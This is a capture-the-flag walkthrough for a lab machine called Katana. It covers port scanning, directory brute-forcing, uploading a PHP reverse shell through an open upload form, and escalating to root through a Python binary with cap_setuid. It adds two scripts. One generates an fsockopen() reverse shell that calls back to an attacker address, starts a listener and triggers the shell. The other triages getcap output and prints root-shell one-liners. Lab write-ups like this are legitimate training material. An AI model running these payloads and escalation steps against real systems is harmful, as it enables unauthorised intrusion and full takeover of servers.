Katana Machine - Walkthrough
1. Reconnaissance
Run a full TCP port scan with default scripts and version detection (-p- covers all 65535 ports, so expect it to take a while):
nmap -sC -sV -p- [TARGET_IP]
Notable open ports:
- FTP (port 21)
- SSH (port 22)
- HTTP (port 80)
- Samba (ports 139, 445)
- LiteSpeed HTTP (port 8088)
- Nginx HTTP (port 8715)
2. Exploring HTTP Services
Start by browsing port 80; nothing useful is found there. Move on to the LiteSpeed service on port 8088 and brute-force hidden files and directories with Gobuster (-x html,php appends those extensions to every wordlist entry; -k only disables TLS verification and is harmless on plain HTTP):
gobuster dir -k -u http://[TARGET_IP]:8088/ -w /usr/share/wordlists/dirb/common.txt -x html,php
Interesting result:
/upload.html : a file upload form.
3. Gaining Foothold
Upload pentestmonkey's php-reverse-shell.php through /upload.html, after editing its $ip and $port values to the attacker's address and listener port.
The upload form on 8088 stores the file where the Nginx instance on port 8715 serves it; after uploading, follow the redirect to find the file's final name (katana_shell.php in this case).
Start a netcat listener first, then request the uploaded file to trigger the reverse shell. Note that the curl request hangs for as long as the shell is alive; a quick 404 means the file did not land where expected.
nc -nlvp 4444
curl http://[TARGET_IP]:8715/katana_shell.php
Once connected, upgrade to an interactive TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
First flag: /var/www/local.txt
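The foothold steps above as one script, added here as a worked example that is not part of the original walkthrough. It writes a compact fsockopen()-based PHP reverse shell as a stand-in for pentestmonkey's script (which is only edited, never generated), starts the listener in the foreground, and fires the trigger request in the background. The attacker address (LHOST), the port 4444 listener and the katana_shell.php location on port 8715 are assumptions taken from the walkthrough, not verified facts; the upload itself is still done by hand in the browser.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): generate the PHP
# reverse shell, start the listener, and trigger the uploaded file.
# Assumed, not taken from the page: the attacker IP passed as LHOST and
# that the upload lands at http://TARGET:8715/katana_shell.php.

# make_php_reverse_shell LHOST LPORT OUTFILE
# Writes a minimal fsockopen()-based reverse shell and echoes it back so
# the caller can sanity-check it before uploading. This is a stand-in for
# pentestmonkey's php-reverse-shell.php: it relies on the socket becoming
# fd 3 in the exec()'d child, which holds on most PHP setups but is less
# robust than the proc_open() loop in the original.
make_php_reverse_shell() {
    lhost=$1 lport=$2 out=$3
    printf '<?php $sock=fsockopen("%s",%s);exec("/bin/sh -i <&3 >&3 2>&3");?>\n' \
        "$lhost" "$lport" > "$out"
    cat "$out"
}

# trigger_shell URL
# Requests the uploaded file. The request stays open while the shell is
# alive, so the caller runs it in the background; a fast 404 printed here
# means the file is not being served from the expected path.
trigger_shell() {
    curl -s -o /dev/null -w 'trigger returned HTTP %{http_code}\n' \
        --connect-timeout 5 "$1"
}

# main TARGET_IP LHOST [LPORT]
main() {
    target=$1 lhost=$2 lport=${3:-4444}
    make_php_reverse_shell "$lhost" "$lport" katana_shell.php > /dev/null
    echo "[*] payload written to katana_shell.php"
    echo "[*] upload it via http://$target:8088/upload.html, then press Enter"
    read -r _
    # Give the listener a head start, then fire the request in the background.
    ( sleep 2; trigger_shell "http://$target:8715/katana_shell.php" ) &
    # Foreground listener: this is the shell you interact with. Upgrade it
    # with python3 -c 'import pty;pty.spawn("/bin/bash")' once connected.
    nc -nlvp "$lport"
}

# Only run the interactive flow when invoked with arguments, e.g.
#   sh deliver_shell.sh 10.10.10.10 10.10.14.5 4444
if [ "$#" -ge 2 ]; then main "$@"; fi
```

Start the listener before anything touches the uploaded file: if the PHP process connects back and nothing is listening, the shell dies immediately and the file has to be requested again.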
4. Privilege Escalation
Check for binaries carrying file capabilities with getcap (these are separate from SUID bits; getcap lists capability sets, not setuid binaries):
/sbin/getcap -r / 2>/dev/null
Python 2.7 has cap_setuid+ep: the capability is in the effective and permitted sets, so the interpreter may call setuid() no matter who runs it.
Use the GTFOBins capabilities technique to become root:
python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
This drops into a root shell (confirm with id). Retrieve the final flag:
cat /root/proof.txt
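Triaging getcap output by hand is error-prone on a real box with dozens of entries, so here is a small POSIX sh helper, added as an example that is not part of the original walkthrough. It filters getcap -r output down to capabilities that commonly give a direct path to root when they sit on an interpreter or a file-handling tool, checks that the capability is actually in the permitted set, and prints the GTFOBins-style one-liner for the case found on this machine (python with cap_setuid). The sample output it runs on is constructed, not captured from the Katana box; the list of "dangerous" capabilities is my own judgement call.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): triage `getcap -r /`
# output for capabilities that usually mean a root shell is one command away.
# SAMPLE_GETCAP below is constructed for illustration, not real scan output.

# Capabilities worth a second look on any binary that takes arbitrary input
# or arguments (compare the GTFOBins "Capabilities" entries). Assumption: this
# list is the author's own triage shortlist, not an exhaustive one.
DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search \
cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner cap_setfcap"

# triage_caps: read getcap lines on stdin, print "path<TAB>cap+flags" for
# every shortlisted capability that is in the permitted set. Handles both the
# older "/path = cap_setuid+ep" and the newer "/path cap_setuid=ep" formats.
triage_caps() {
    while IFS= read -r line; do
        [ -z "$line" ] && continue
        path=${line%% *}
        rest=${line#"$path"}
        rest=${rest#" = "}                 # older libcap output
        rest=${rest#" "}                   # newer libcap output
        # A clause is "cap_a,cap_b+flags" or "cap_a,cap_b=flags".
        for clause in $rest; do
            case $clause in
                *+*) names=${clause%%+*}; flags=${clause#*+} ;;
                *=*) names=${clause%%=*}; flags=${clause#*=} ;;
                *)   continue ;;
            esac
            # Without 'p' (permitted) the capability cannot be used at all.
            case $flags in *p*) ;; *) continue ;; esac
            oldifs=$IFS; IFS=,
            for cap in $names; do
                case " $DANGEROUS_CAPS " in
                    *" $cap "*) printf '%s\t%s+%s\n' "$path" "$cap" "$flags" ;;
                esac
            done
            IFS=$oldifs
        done
    done
}

# suggest_escalation PATH CAP
# Prints the command to run for the combination seen on Katana (an
# interpreter with cap_setuid); anything else is left to the operator.
suggest_escalation() {
    case "$2:$(basename "$1")" in
        cap_setuid:python*)
            echo "$1 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'" ;;
        *)
            echo "# $1 has $2: check the GTFOBins capabilities entry for $(basename "$1")" ;;
    esac
}

# Constructed sample of `getcap -r / 2>/dev/null` output, mixing both formats.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
/usr/bin/tar cap_dac_read_search=ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep'

# Stand-alone use: `sh triage_caps.sh -` reads real getcap output from stdin,
# e.g. /sbin/getcap -r / 2>/dev/null | sh triage_caps.sh -
# With no arguments it runs on the constructed sample.
if [ "$#" -gt 0 ]; then cat "$@"; else printf '%s\n' "$SAMPLE_GETCAP"; fi |
    triage_caps |
    while IFS="$(printf '\t')" read -r path cap; do
        suggest_escalation "$path" "${cap%%+*}"
    done
```

On the sample this reports python2.7 (cap_setuid) and tar (cap_dac_read_search, which lets tar read any file, /root/proof.txt and /etc/shadow included) and ignores ping, whose cap_net_raw is expected and harmless. Treat the output as a shortlist to verify by hand, not as proof of a working escalation.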
5. Flags
- User flag: /var/www/local.txt
- Root flag: /root/proof.txt